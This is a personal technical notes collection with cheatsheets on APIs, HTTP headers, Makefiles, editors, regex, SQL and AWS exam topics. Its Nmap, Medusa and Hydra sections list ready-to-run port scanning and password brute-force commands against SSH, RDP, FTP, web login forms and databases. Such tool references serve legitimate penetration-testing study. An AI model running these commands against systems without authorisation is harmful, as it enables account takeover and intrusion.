Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Summary

These are my notes, there are many like them, but these ones are mine.

Cheatsheets

Directory Map

API Architectural Styles

REST

Proposed in 2000, REST is the most used style. It is often used between front-end clients and back-end services. It is compliant with 6 architectural constraints. The payload format can be JSON, XML, HTML, or plain text.

GraphQL

GraphQL was proposed in 2015 by Meta. It provides a schema and type system, suitable for complex systems where the relationships between entities are graph-like. For example, in the diagram below, GraphQL can retrieve user and order information in one call, while in REST this needs multiple calls.

GraphQL is not a replacement for REST. It can be built upon existing REST services.

Web Socket

Web socket is a protocol that provides full-duplex communications over TCP. The clients establish web sockets to receive real-time updates from the back-end services. Unlike REST, which always “pulls” data, web socket enables data to be “pushed”.

Webhook

Webhooks are usually used by third-party asynchronous API calls. In the diagram below, for example, we use Stripe or Paypal for payment channels and register a webhook for payment results. When a third-party payment service is done, it notifies the payment service if the payment is successful or failed. Webhook calls are usually part of the system’s state machine.

gRPC

Released in 2016, gRPC is used for communications among microservices. gRPC library handles encoding/decoding and data transmission.

SOAP

SOAP stands for Simple Object Access Protocol. Its payload is XML only, suitable for communications between internal systems.

cap theorem

CAP theorem states that it is impossible for a distributed system to provide more than two of these guarantees: consistency, availability, and partition tolerance.

  • Consistency
    • All clients see the same data at the same time from any node

  • Availability

    • The ability for a system to respond to requests from users at all times


  • Partition Tolerance

    • The ability for a system to continue operating even if there is a partition in the network

standard http headers

HeaderExampleDescription
A-IMA-IM: feedInstance manipulations that are acceptable in the response. Defined in RFC 3229
AcceptAccept: application/jsonThe media type/types acceptable
Accept-CharsetAccept-Charset: utf-8The charset acceptable
Accept-EncodingAccept-Encoding: gzip, deflateList of acceptable encodings
Accept-LanguageAccept-Language: en-USList of acceptable languages
Accept-DatetimeAccept-Datetime: Thu, 31 May 2007 20:35:00 GMTRequest a past version of the resource prior to the datetime passed
Access-Control-Request-MethodAccess-Control-Request-Method: GETUsed in a CORS request
Access-Control-Request-HeadersAccess-Control-Request-Headers: origin, x-requested-with, acceptUsed in a CORS request
AuthorizationAuthorization: Basic 34i3j4iom2323==HTTP basic authentication credentials
Cache-ControlCache-Control: no-cacheSet the caching rules
ConnectionConnection: keep-aliveControl options for the current connection. Accepts keep-alive and close. Deprecated in HTTP/2
Content-LengthContent-Length: 348The length of the request body in bytes
Content-TypeContent-Type: application/x-www-form-urlencodedThe content type of the body of the request (used in POST and PUT requests)
CookieCookie: name=valuehttps://flaviocopes.com/cookies/
DateDate: Tue, 15 Nov 1994 08:12:31 GMTThe date and time that the request was sent
ExpectExpect: 100-continueIt’s typically used when sending a large request body. We expect the server to return back a 100 Continue HTTP status if it can handle the request, or 417 Expectation Failed if not
ForwardedForwarded: for=192.0.2.60; proto=http; by=203.0.113.43Disclose original information of a client connecting to a web server through an HTTP proxy. Used for testing purposes only, as it discloses privacy sensitive information
FromFrom: user@example.comThe email address of the user making the request. Meant to be used, for example, to indicate a contact email for bots.
HostHost: flaviocopes.comThe domain name of the server (used to determined the server with virtual hosting), and the TCP port number on which the server is listening. If the port is omitted, 80 is assumed. This is a mandatory HTTP request header
If-MatchIf-Match: “737060cd8c284d8582d”Given one (or more) ETags, the server should only send back the response if the current resource matches one of those ETags. Mainly used in PUT methods to update a resource only if it has not been modified since the user last updated it
If-Modified-SinceIf-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMTAllows to return a 304 Not Modified response header if the content is unchanged since that date
If-None-MatchIf-None-Match: “737060cd882f209582d”Allows a 304 Not Modified response header to be returned if content is unchanged. Opposite of If-Match.
If-RangeIf-Range: “737060cd8c9582d”Used to resume downloads, returns a partial if the condition is matched (ETag or date) or the full resource if not
If-Unmodified-SinceIf-Unmodified-Since: Sat, 29 Oct 1994 19:43:31 GMTOnly send the response if the entity has not been modified since the specified time
Max-ForwardsMax-Forwards: 10Limit the number of times the message can be forwarded through proxies or gateways
OriginOrigin: http://mydomain.comSend the current domain to perform a CORS request, used in an OPTIONS HTTP request (to ask the server for Access-Control- response headers)
PragmaPragma: no-cacheUsed for backwards compatibility with HTTP/1.0 caches
Proxy-AuthorizationProxy-Authorization: Basic 2323jiojioIJOIOJIJ==Authorization credentials for connecting to a proxy
RangeRange: bytes=500-999Request only a specific part of a resource
RefererReferer: https://flaviocopes.comThe address of the previous web page from which a link to the currently requested page was followed.
TETE: trailers, deflateSpecify the encodings the client can accept. Accepted values: compress, deflate, gzip, trailers. Only trailers is supported in HTTP/2
User-AgentUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36The string that identifies the user agent
UpgradeUpgrade: h2c, HTTPS/1.3, IRC/6.9, RTA/x11, websocketAsk the server to upgrade to another protocol. Deprecated in HTTP/2
ViaVia: 1.0 fred, 1.1 example.com (Apache/1.1)Informs the server of proxies through which the request was sent
WarningWarning: 199 Miscellaneous warningA general warning about possible problems with the status of the message. Accepts a special range of values.
DntDNT: 1If enabled, asks servers to not track the user
X-CSRF-TokenX-CSRF-Token: Used to prevent CSRF

Latency Numbers Every SRE Should Know

nanosecond = 1/1,000,000,000 second microsecond = 1/1,000,000 second millisecond = 1/1000 second

Sub-Nanosecond Range

  • Accessing CPU registers
  • CPU Clock Cycle

1-10 Nanosecond Range

  • L1/L2 cache
  • Branch Misprediction in CPU pipelining

10-100 Nanosecond Range

  • L3 cache
  • Apple M1 referencing main memory (RAM)

100-1000 Nanosecond Range

  • System call on Linux
  • MD5 hash a 64-bit number

1-10 Microsecond Range

  • Context switching between Linux threads

10-100 Microsecond Range

  • Process a HTTP request
  • Reading 1 megabyte of sequential data from RAM
  • Read an 8k page from an ssd

100-1000 Microsecond Range

  • SSD write Latency
  • Intra-zone networking round trip in most cloud providers
  • Memcache/Redis get operation

1-10 Millisecond Range

  • Inter-zone networking Latency
  • Seek time of a HDD

10-100 Millisecond Range

  • Network round trip between US-west and US-east coast
  • Read 1 megabyte sequentially from main memory

100-1000 Millisecond Range

  • Some encryption/hashing algorithms
  • TLS handshake
  • Read 1 Gigabyte sequentially from an SSD

1 second+

  • Transfer 1GB over a cloud network within the same region

Make Files

Why do Make files exist?

Make files are used for automation. Typically as a step in the software development lifecycle (compilation, builds, etc.). However, they can be used for any other task that can be automated via the shell.

Make files must be indented using tabs, not spaces

Makefile Syntax

Makefiles consist of a set of rules. Rules typically look like this:

targets: prerequisites
	command
	command
	command
  • The targets are file names, separated by spaces. Typically, there is only 1 per rule.
  • The commands are a series of steps typically used to make targets.
  • The prerequisites are also file names, separated by spaces. These files need to exist before the commands for the target are run. These are dependencies to the targets.

Example

Let’s start with a hello world example:

hello:
	echo "Hello, World"
	echo "This line will print if the file hello does not exist."

There’s already a lot to take in here. Let’s break it down:

  • We have one target called hello
  • This target has two commands
  • This target has no prerequisites

We’ll then run make hello. As long as the hello file does not exist, the commands will run. If hello does exist, no commands will run. It’s important to realize that I’m talking about hello as both a target and a file. That’s because the two are directly tied together. Typically, when a target is run (aka when the commands of a target are run), the commands will create a file with the same name as the target. In this case, the hello target does not create the hello file.

Let’s create a more typical Makefile - one that compiles a single C file. But before we do, make a file called blah.c that has the following contents:

// blah.c
int main() { return 0; }

Then create the Makefile (called Makefile, as always):

blah:
	cc blah.c -o blah

This time, try simply running make. Since there’s no target supplied as an argument to the make command, the first target is run. In this case, there’s only one target (blah). The first time you run this, blah will be created. The second time, you’ll see make: ‘blah’ is up to date. That’s because the blah file already exists. But there’s a problem: if we modify blah.c and then run make, nothing gets recompiled.

We solve this by adding a prerequisite:

blah: blah.c
	cc blah.c -o blah

When we run make again, the following set of steps happens:

  • The first target is selected, because the first target is the default target
  • This has a prerequisite of blah.c
  • Make decides if it should run the blah target. It will only run if blah doesn’t exist, or blah.c is newer than blah

This last step is critical, and is the essence of make. What it’s attempting to do is decide if the prerequisites of blah have changed since blah was last compiled. That is, if blah.c is modified, running make should recompile the file. And conversely, if blah.c has not changed, then it should not be recompiled.

To make this happen, it uses the filesystem timestamps as a proxy to determine if something has changed. This is a reasonable heuristic, because file timestamps typically will only change if the files are modified. But it’s important to realize that this isn’t always the case. You could, for example, modify a file, and then change the modified timestamp of that file to something old. If you did, Make would incorrectly guess that the file hadn’t changed and thus could be ignored.

Make Clean

clean is often used as a target that removes the output of other targets, but it is not a special word in Make. You can run make and make clean on this to create and delete some_file.

Note that clean is doing two new things here:

  • It’s a target that is not first (the default), and not a prerequisite. That means it’ll never run unless you explicitly call make clean
  • It’s not intended to be a filename. If you happen to have a file named clean, this target won’t run, which is not what we want. See .PHONY later in this tutorial on how to fix this
some_file: 
	touch some_file

clean:
	rm -f some_file

Variables

Variables can only be strings. You’ll typically want to use :=, but = also works.

Here’s an example of using variables:

files := file1 file2
some_file: $(files)
	echo "Look at this variable: " $(files)
	touch some_file

file1:
	touch file1
file2:
	touch file2

clean:
	rm -f file1 file2 some_file

targets

The ‘all’ target

Making multiple targets and you want all of them to run? Make an all target. Since this is the first rule listed, it will run by default if make is called without specifying a target.

all: one two three

one:
	touch one
two:
	touch two
three:
	touch three

clean:
	rm -f one two three

Multiple targets

When there are multiple targets for a rule, the commands will be run for each target. $@ is an automatic variable that contains the target name.

all: f1.o f2.o

f1.o f2.o:
	echo $@
# Equivalent to:
# f1.o:
#	 echo f1.o
# f2.o:
#	 echo f2.o

Reference

Var assignment

foo  = "bar"
bar  = $(foo) foo  # dynamic (renewing) assignment
foo := "boo"       # one time assignment, $(bar) now is "boo foo"
foo ?= /usr/local  # safe assignment, $(foo) and $(bar) still the same
bar += world       # append, "boo foo world"
foo != echo fooo   # exec shell command and assign to foo
# $(bar) now is "fooo foo world"

= expressions are only evaluated when they’re being used.

Magic variables

out.o: src.c src.h
  $@   # "out.o" (target)
  $<   # "src.c" (first prerequisite)
  $^   # "src.c src.h" (all prerequisites)

%.o: %.c
  $*   # the 'stem' with which an implicit rule matches ("foo" in "foo.c")

also:
  $+   # prerequisites (all, with duplication)
  $?   # prerequisites (new ones)
  $|   # prerequisites (order-only?)

  $(@D) # target directory

Command prefixes

PrefixDescription
-Ignore errors
@Don’t print command
+Run even if Make is in ‘don’t execute’ mode
build:
    @echo "compiling"
    -gcc $< $@

-include .depend

Find files

js_files  := $(wildcard test/*.js)
all_files := $(shell find images -name "*")

Substitutions

file     = $(SOURCE:.cpp=.o)   # foo.cpp => foo.o
outputs  = $(files:src/%.coffee=lib/%.js)

outputs  = $(patsubst %.c, %.o, $(wildcard *.c))
assets   = $(patsubst images/%, assets/%, $(wildcard images/*))

More functions

$(strip $(string_var))

$(filter %.less, $(files))
$(filter-out %.less, $(files))

Building files

%.o: %.c
  ffmpeg -i $< > $@   # Input and output
  foo $^

Includes

-include foo.make

Options

make
  -e, --environment-overrides
  -B, --always-make
  -s, --silent
  -j, --jobs=N   # parallel processing

Conditionals

foo: $(objects)
ifeq ($(CC),gcc)
  $(CC) -o foo $(objects) $(libs_for_gcc)
else
  $(CC) -o foo $(objects) $(normal_libs)
endif

Recursive

deploy:
  $(MAKE) deploy2

Further reading

Neovim Cheatsheet

Mode Switching:

  • i: Insert mode before cursor
  • I: Insert mode at the beginning of line
  • a: Insert mode after cursor
  • A: Insert mode at the end of line
  • v: Visual mode
  • V: Visual line mode
  • ^V (Ctrl + V): Visual block mode
  • :q: Quit (add ! to force)
  • :w: Save/write
  • :wq or ZZ: Save and Quit

Cursor Movement:

  • h: Left
  • j: Down
  • k: Up
  • l: Right
  • w: Jump by start of words
  • e: Jump to end of words
  • b: Jump backward by words
  • 0: Start of line
  • $: End of line
  • G: Go to last line of document
  • gg: Go to first line of document
  • ^: First non-blank character of line
  • : followed by a number: Go to that line number (e.g., :10)

Editing:

  • u: Undo
  • ^R (Ctrl + R): Redo
  • yy or Y: Yank/copy line
  • dd: Delete line
  • D: Delete from cursor to end of line
  • x: Delete character under cursor
  • p: Paste after cursor
  • P: Paste before cursor
  • r followed by a character: Replace character under cursor with the new character
  • cw: Change word

Search and Replace:

  • / followed by a term: Search for term (press n to go to next and N for previous)
  • :%s/old/new/g: Replace all occurrences of “old” with “new” in the entire file

Windows & Tabs:

  • ^W (Ctrl + W) followed by h/j/k/l: Move cursor to another window
  • :split or :sp: Split window horizontally
  • :vsplit or :vsp: Split window vertically
  • :tabnew or :tabn: Create a new tab
  • gt: Move to next tab
  • gT: Move to previous tab

Others:

  • .: Repeat last command
  • *: Search for word under cursor
  • #: Search for word under cursor, backwards
  • ~: Switch case of character under cursor
  • o: Insert new line below and enter insert mode
  • O: Insert new line above and enter insert mode
  • : Indent line

  • <<: Dedent line

Nmap Cheatsheet

Basic Scan Types

ScanCommandPurpose
Ping Scannmap -sn <target>Check if host is up.
SYN Scannmap -sS <target>Stealthy fast TCP scan.
Service Version Scannmap -sV <target>Scan service version of open ports.
Connect Scannmap -sT <target>Full TCP handshake; accurate but noisy.
UDP Scannmap -sU <target>Scan UDP ports (slow).
Version Scannmap -sV <target>Identify service versions.
OS Detectionnmap -O <target>Guess OS.
Aggressive Scannmap -A <target>OS, version, scripts, traceroute.

Port Selection

OptionMeaning
-p 22Scan one port
-p 22,80,443Scan list
-p 1-65535Scan range
-p-Scan all ports
--top-ports=10Scan most common ports
-FFast scan (top 100)

Important Flags

FlagDescription
-PnNo host discovery; treat host as up
-nNo DNS resolution
--disable-arp-pingDisable ARP ping
--packet-traceShow all sent/received packets
--reasonExplain port states
-T4Faster timing template
--stats-every=5s Show stats every 5 seconds

Port States

StateMeaning
openAccepts connections
closedResponds with RST
filteredBlocked by firewall
unfilteredReachable, state unknown
open|filteredNo response
closed|filteredIdle scan ambiguity

Useful Examples

Scan Top 10 TCP Ports

nmap --top-ports=10 <target>

Full TCP + UDP + Version + OS

nmap -sS -sU -sV -O <target>

Packet Trace Example

nmap -p 21 --packet-trace -Pn -n --disable-arp-ping <target>

Service Enumeration

nmap -sV -p <port> <target>

Medusa Cheatsheet

Medusa is a fast, massively parallel, and modular login brute-forcer designed to support a wide array of services that allow remote authentication.

Installation

sudo apt-get -y update
sudo apt-get -y install medusa

Command Syntax

medusa [target_options] [credential_options] -M module [module_options]

Parameters

ParameterExplanationUsage Example
-h HOSTTarget: Single hostname or IP addressmedusa -h 192.168.1.10 ...
-H FILETarget: File containing list of targetsmedusa -H targets.txt ...
-u USERNAMEUsername: Single usernamemedusa -u admin ...
-U FILEUsername: File containing usernamesmedusa -U usernames.txt ...
-p PASSWORDPassword: Single passwordmedusa -p password123 ...
-P FILEPassword: File containing passwordsmedusa -P passwords.txt ...
-M MODULEModule: Specific module to usemedusa -M ssh ...
-m "OPTION"Module options: Additional parameters for modulemedusa -M http -m "POST /login.php..."
-t TASKSTasks: Number of parallel login attemptsmedusa -t 4 ...
-fFast mode: Stop after first success on current hostmedusa -f ...
-FFast mode: Stop after first success on any hostmedusa -F ...
-n PORTPort: Specify non-default portmedusa -n 2222 ...
-v LEVELVerbose: Detailed output (0-6)medusa -v 4 ...
-e nsEmpty/Default: Check empty (n) and same as username (s)medusa -e ns ...

Modules

ModuleService/ProtocolDescriptionUsage Example
ftpFile Transfer ProtocolBrute-force FTP login credentialsmedusa -M ftp -h 192.168.1.100 -u admin -P passwords.txt
httpHypertext Transfer ProtocolBrute-force HTTP login forms (GET/POST)medusa -M http -h www.example.com -U users.txt -P passwords.txt -m DIR:/login.php -m FORM:username=^USER^&password=^PASS^
imapInternet Message Access ProtocolBrute-force IMAP logins for email serversmedusa -M imap -h mail.example.com -U users.txt -P passwords.txt
mysqlMySQL DatabaseBrute-force MySQL database credentialsmedusa -M mysql -h 192.168.1.100 -u root -P passwords.txt
pop3Post Office Protocol 3Brute-force POP3 logins for email retrievalmedusa -M pop3 -h mail.example.com -U users.txt -P passwords.txt
rdpRemote Desktop ProtocolBrute-force RDP logins for Windows remote desktopmedusa -M rdp -h 192.168.1.100 -u admin -P passwords.txt
sshSecure Shell (SSH)Brute-force SSH logins for secure remote accessmedusa -M ssh -h 192.168.1.100 -u root -P passwords.txt
svnSubversion (SVN)Brute-force Subversion repositoriesmedusa -M svn -h 192.168.1.100 -u admin -P passwords.txt
telnetTelnet ProtocolBrute-force Telnet servicesmedusa -M telnet -h 192.168.1.100 -u admin -P passwords.txt
vncVirtual Network ComputingBrute-force VNC login credentialsmedusa -M vnc -h 192.168.1.100 -P passwords.txt
web-formWeb Login FormsBrute-force login forms using HTTP POSTmedusa -M web-form -h www.example.com -U users.txt -P passwords.txt -m FORM:"username=^USER^&password=^PASS^:F=Invalid"

Useful Examples

SSH Brute-Force Attack

medusa -h 192.168.0.100 -U usernames.txt -P passwords.txt -M ssh

Multiple Web Servers with Basic HTTP Authentication

medusa -H web_servers.txt -U usernames.txt -P passwords.txt -M http -m GET

Test for Empty or Default Passwords

medusa -h 10.0.0.5 -U usernames.txt -e ns -M ssh

HTTP POST Form Attack

medusa -M http -h www.example.com -U users.txt -P passwords.txt -m "POST /login.php HTTP/1.1\r\nContent-Length: 30\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nusername=^USER^&password=^PASS^"

Fast Mode (Stop on First Success)

medusa -h 192.168.1.100 -U usernames.txt -P passwords.txt -M ssh -f

Custom Port SSH Attack

medusa -h 192.168.1.100 -n 2222 -U usernames.txt -P passwords.txt -M ssh

Verbose Output

medusa -h 192.168.1.100 -U usernames.txt -P passwords.txt -M ssh -v 4

Parallel Tasks

medusa -h 192.168.1.100 -U usernames.txt -P passwords.txt -M ssh -t 8

Hydra Cheatsheet

Basic Syntax

hydra [login_options] [password_options] [attack_options] [service_options] service://server

Login Options

OptionDescriptionExample
-l LOGINSingle usernamehydra -l admin ...
-L FILEUsername list filehydra -L usernames.txt ...

Password Options

OptionDescriptionExample
-p PASSSingle passwordhydra -p password123 ...
-P FILEPassword list filehydra -P passwords.txt ...
-x MIN:MAX:CHARSETGenerate passwordshydra -x 6:8:aA1 ...

Attack Options

OptionDescriptionExample
-t TASKSNumber of parallel tasks (threads)hydra -t 4 ...
-fStop after first successful loginhydra -f ...
-s PORTSpecify non-default porthydra -s 2222 ...
-vVerbose outputhydra -v ...
-VVery verbose outputhydra -V ...

Common Services

ServiceProtocolDescriptionExample
ftpFTPFile Transfer Protocolhydra -l admin -P passwords.txt ftp://192.168.1.100
sshSSHSecure Shellhydra -l root -P passwords.txt ssh://192.168.1.100
http-getHTTP GETWeb login (GET)hydra -l admin -P passwords.txt http-get://example.com/login
http-postHTTP POSTWeb login (POST)hydra -l admin -P passwords.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"
smtpSMTPEmail sendinghydra -l admin -P passwords.txt smtp://mail.server.com
pop3POP3Email retrievalhydra -l user@example.com -P passwords.txt pop3://mail.server.com
imapIMAPRemote email accesshydra -l user@example.com -P passwords.txt imap://mail.server.com
rdpRDPRemote Desktop Protocolhydra -l administrator -P passwords.txt rdp://192.168.1.100
telnetTelnetRemote terminalhydra -l admin -P passwords.txt telnet://192.168.1.100
mysqlMySQLDatabasehydra -l root -P passwords.txt mysql://192.168.1.100
postgresPostgreSQLDatabasehydra -l postgres -P passwords.txt postgres://192.168.1.100

Useful Examples

SSH Brute Force

hydra -l root -P /path/to/passwords.txt -t 4 ssh://192.168.1.100

FTP Brute Force

hydra -L usernames.txt -P passwords.txt ftp://192.168.1.100

HTTP POST Form Attack

hydra -l admin -P passwords.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect" 192.168.1.100

RDP with Password Generation

hydra -l administrator -x 6:8:aA1 rdp://192.168.1.100

SSH on Non-Default Port

hydra -l admin -P passwords.txt -s 2222 ssh://192.168.1.100

Stop After First Success

hydra -l admin -P passwords.txt -f ssh://192.168.1.100

Verbose Output

hydra -l admin -P passwords.txt -v ssh://192.168.1.100

RDP with Custom Character Set

hydra -l administrator -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 rdp://192.168.1.100

Ranger Cheatsheet

General

ShortcutDescription
rangerStart Ranger
QQuit Ranger
RReload current directory
?Ranger Manpages / Shortcuts

Movement

ShortcutDescription
kup
jdown
hparent directory
lsubdirectory
gggo to top of list
Ggo t bottom of list
Jhalf page down
Khalf page up
HHistory Back
LHistory Forward
~Switch the view

File Operations

ShortcutDescription
<Enter>Open
ropen file with
ztoggle settings
ochange sort order
zhview hidden files
cwrename current file
yyyank / copy
ddcut
pppaste
/search for files :search
nnext match
Nprev match
<delete>Delete

Commands

ShortcutDescription
:Execute Range Command
!Execute Shell Command
chmodChange file Permissions
duDisk Usage Current Directory
SRun the terminal in your current ranger window (exit to go back to ranger)

Tabs

ShortcutDescription
C-nCreate new tab
C-wClose current tab
tabNext tab
shift + tabPrevious tab
alt + [n]goto / create [n] tab

File substituting

ShortcutDescription
%fSubstitute highlighted file
%dSubstitute current directory
%sSubstitute currently selected files
%tSubstitute currently tagged files

Example for substitution

:bulkrename %s

Marker

ShortcutDescription
m + <letter>Create Marker
um + <letter>Delete Marker
' + <letter>Go to Marker
ttag a file with an *
t"<any>tag a file with your desired mark

thx to the comments section for additional shortcuts! post your suggestions there!

Regex Cheatsheet

Regular expressions (regex) are patterns used for string matching and manipulation. Here’s a quick reference guide for common regex syntax:

Basics

  • .: Matches any character except a newline.
  • ^: Matches the start of a string or line.
  • $: Matches the end of a string or line.

Character Classes

  • [abc]: Matches any character a, b, or c.
  • [^abc]: Matches any character except a, b, or c.
  • [a-z]: Matches any lowercase letter.
  • [A-Z]: Matches any uppercase letter.
  • [0-9]: Matches any digit.
  • [a-zA-Z0-9]: Matches any alphanumeric character.
  • \d: Matches any digit (short for [0-9]).
  • \w: Matches any word character (alphanumeric + underscore).
  • \s: Matches any whitespace character (space, tab, newline).

Quantifiers

  • *: Matches the preceding element zero or more times.
  • +: Matches the preceding element one or more times.
  • ?: Matches the preceding element zero or one time.
  • {n}: Matches the preceding element exactly n times.
  • {n,}: Matches the preceding element n or more times.
  • {n,m}: Matches the preceding element between n and m times.

Groups and Alternation

  • (abc): Matches the group abc and captures it.
  • (?:abc): Matches the group abc without capturing it.
  • a|b: Matches either a or b.

Anchors

  • \b: Matches a word boundary.
  • \B: Matches a position that is not a word boundary.
  • (?=...): Positive lookahead assertion.
  • (?!...): Negative lookahead assertion.

Escaping Special Characters

  • \\: Escapes a special character (e.g., \\. matches a literal period).

Flags (Depends on Language)

  • i: Case-insensitive matching.
  • g: Global match (find all occurrences).
  • m: Multiline mode (^ and $ match the start/end of each line).
  • s: Dot matches all, including newlines.
  • u: Treat the pattern and input as UTF-16 or UTF-32.
  • x: Ignore whitespace and allow comments.

Examples

  • /\d{3}-\d{2}-\d{4}/: Matches a standard US social security number.
  • /^[A-Za-z]+$/: Matches a string containing only letters.
  • /https?:\/\/(www\.)?\w+\.\w+/: Matches URLs starting with http:// or https://.
  • /(\d+)\s?-\s?\1/: Matches repeated numbers separated by a hyphen.
  • ^(\/[^\/?]+)(\/[^\/?]+)?(\/[^\/?]+)?: Match all text up to the 3rd ‘/’ in a URL
  • ^[a-z][a-z0-9+\-.]*://([a-z0-9\-._~%!$&'()*+,;=]+@)?([a-z0-9\-._~%]+|\[[a-z0-9\-._~%!$&'()*+,;=:]+\]): extract hostname from URL
  • ^https?:\/\/(.*)(\/[^\/?]+)(\/[^\/?]+)?(\/[^\/?]+)?: Match protocol (http/s), hostname, and path (3 forward slashes)

https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_expressions/Cheatsheet

SQL Cheat Sheet

Who has a role:

 select @@ServerName [Server Name], DB_NAME() [DB Name], u.name [DB Role], u2.name [Member Name]
    from sys.database_role_members m
    join sys.database_principals u on m.role_principal_id = u.principal_id
    join sys.database_principals u2 on m.member_principal_id = u2.principal_id
    where u.name = 'db_owner'
    order by [Member Name]

Who logged in as dbo:

#in user database run the command 
SELECT name, sid FROM sys.sysusers where name = 'dbo' . 
#in master database run the command 
SELECT name, sid FROM sys.sql_logins

multi-line strings

There are 9 (or 63*, depending how you count) different ways to write multi-line strings in YAML.

  • Use > most of the time: interior line breaks are stripped out, although you get one at the end:

      key: >
      Your long
      string here.
    
  • Use | if you want those linebreaks to be preserved as \n (for instance, embedded markdown with paragraphs):

      key: |
      ### Heading
    
      * Bullet
      * Points
    
  • Use >- or |- instead if you don’t want a linebreak appended at the end.

  • Use “…” if you need to split lines in the middle of words or want to literally type linebreaks as \n:

     key: "Hello\
     World!\n\nGet on it."
    

Clouds

Notes related to various cloud service providers.

Directory Map

AWS

Notes related to Amazon Web Services (AWS).

DVA-C02-notes

Directory Map

Elastic Beanstalk

Introduction

  • Developer centric view of deploying an application on AWS
  • Simplifies deploying EC2, ASG, ELB, RDS, etc.
  • Fully managed by AWS

Beanstalk Components

  • Application: A collection of Beanstalk components
  • Application Version: an iteration of your application
  • Environment:
    • collection of AWS resources running an application version
    • Tiers: web server environment and worker environment
    • You can create multiple environments (dev, prod, QA, etc.)

Supported Platforms

  • Multiple languages supported: Go, Python, Java, .NET, Node, PHP, Ruby, Packer Builder,
  • Supports single container docker, multi-container docker, etc.

Deployment Modes

  • Single Instance
    • One EC2 instance
    • Great for dev environments
  • HA with Load Balancer
    • Multiple EC2 instances in ASG
    • Great for prod

Deployment Options

  • All at once
    • fastest, but instances aren’t available to service traffic for a bit (downtime)
  • Rolling
    • A few instances at a time are taken offline and updated
  • Rolling with additional batches
    • Like rolling, but spins up new instances to move the batch
  • Immutable
    • Spins up new instances in a new ASG, deploys versions to these instances, and then swaps all the instances when the new are healthy
  • Blue/Green
    • Create a new environment and switch over when ready
  • Traffic Splitting
    • Like canary testing

Beanstalk Lifecycle Policy

  • Beanstalk can store at most 1000 application versions
  • Versions currently in use cannot be deleted

CloudFormation

Introduction

  • Declarative language for deploying resources in AWS
  • YAML or JSON
  • CloudFormation templates can be visualized using Application Composer

Example

---
Resources:
  MyInstance:
    Type: AWS::EC2::Instance
    Properties:
      AvailabilityZone: us-east-1a
      ImageId: ami-0a3c3a20c09d6f377
      InstanceType: t2.micro

CloudFormation Template Sections

  • Resources

    • The only required section in a template
    • The resources section represent the AWS components that the CF template will deploy
    • Resource type identifiers are in this format:
      • service-provider::service-name::data-type-name
  • Parameters

    • Provide input to your CF templates
  • Mappings

    • Fixed variables in your CF template used to differentiate between different environment like dev vs prod, regions, AMI types, etc.

    • To access values in a map, use Fn::FindInMap:

          {
            ...
            "Mappings" : {
              "RegionMap" : {
                "us-east-1" : {
                  "HVM64" : "ami-0ff8a91507f77f867", "HVMG2" : "ami-0a584ac55a7631c0c"
                },
                "us-west-1" : {
                  "HVM64" : "ami-0bdb828fd58c52235", "HVMG2" : "ami-066ee5fd4a9ef77f1"
                },
                "eu-west-1" : {
                  "HVM64" : "ami-047bb4163c506cd98", "HVMG2" : "ami-0a7c483d527806435"
                },
                "ap-southeast-1" : {
                  "HVM64" : "ami-08569b978cc4dfa10", "HVMG2" : "ami-0be9df32ae9f92309"
                },
                "ap-northeast-1" : {
                  "HVM64" : "ami-06cd52961ce9f0d85", "HVMG2" : "ami-053cdd503598e4a9d"
                }
              }
            },
      
            "Resources" : {
              "myEC2Instance" : {
                "Type" : "AWS::EC2::Instance",
                "Properties" : {
                  "ImageId" : {
                    "Fn::FindInMap" : [
                      "RegionMap",
                      {
                        "Ref" : "AWS::Region"
                      },
                      "HVM64"
                    ]
                  },
                  "InstanceType" : "m1.small"
                }
              }
            }
          }
      
  • Outputs

    • Optional
    • Output values can be referenced in other stacks
    • Use FN:ImportValue
  • Conditions

    • Control the creation of resources or outputs based on a condition

Intrinsic Functions

  • Fn::Ref - Get a references to a value of a paremeter, physical Id of a resource, etc.
  • Fn::GetAtt - Get attributes from a resource
  • Fn::FindInMap - Retrieve a value from a map
  • Fn::ImportValue - Import an output value from another template
  • Fn::Base64 - Convert a value to Base64 inside a template
  • Condition Functions (Fn::If, Fn::Not, Fn::Equals, etc.)
  • etc….

Service Roles

  • IAM roles that allow CloudFormation to create/update/delete stack resources

CloudFront

Table of Contents

Introduction

  • Content Distribution Network (CDN) creates cached copies of your website at various Edge locations around the world
  • Content Delivery Network (CDN)
    • A CDN is a distributed network of servers which delivers web pages and content to users based on their geographical location, the origin of the webpage and a content delivery server
      • Can be used to deliver an entire website including static, dynamic and streaming
      • 216 points of presence globally
      • DDoS protection since it is a global service. Integrates with AWS Shield and AWS WAF
      • Requests for content are served from the nearest Edge Location for the best possible performance

CloudFront Core Components

  • Origin
    • The location where all of original files are located. For example an S3 Bucket, EC2 Instance, ELB or Route53
  • Edge Location
    • The location where web content will be cached. This is different than an AWS Region or AZ
  • Distribution
    • A collection of Edge locations which defines how cached content should behave

CloudFront Distributions

  • A distribution is a collection of Edge Location. You specific the Origin eg. S3, EC2, ELB, Route53
  • It replicates copies based on your Price Class
  • There are two types of Distributions
    1. Web (for Websites)
    2. RTMP (for streaming media)
  • Behaviors
    • Redirect to HTTPs, Restrict HTTP Methods, Restrict Viewer Access, Set TTLs
  • Invalidations
    • You can manually invalidate cache on specific files via Invalidations
  • Error Pages
    • You can serve up custom error pages eg 404
  • Restrictions
    • You can use Geo Restriction to blacklist or whitelist specific countries

Lambda@Edge

  • Lambda@Edge functions are used to override the behavior of request and responses

  • Lambda@Edge lets you run Lambda functions to customize the content that CloudFront delivers, executing the functions in AWS locations closer to the viewer.

  • The functions run in response to CloudFront events, without provisioning or managing servers. You can use Lambda functions to change CloudFront requests and responses at the following points:

  • The 4 Available Edge Functions

    1. Viewer Request
      • When CloudFront receives a request from a Viewer
    2. Origin request
      • Before CLoudFront forwards a request to the origin
    3. Origin response
      • When cloudfront receives a response from the origin
    4. Viewer response
      • Before CLoudFront returns the response to the viewer

CloudFront Protection

  • By Default a Distribution allows everyone to have access
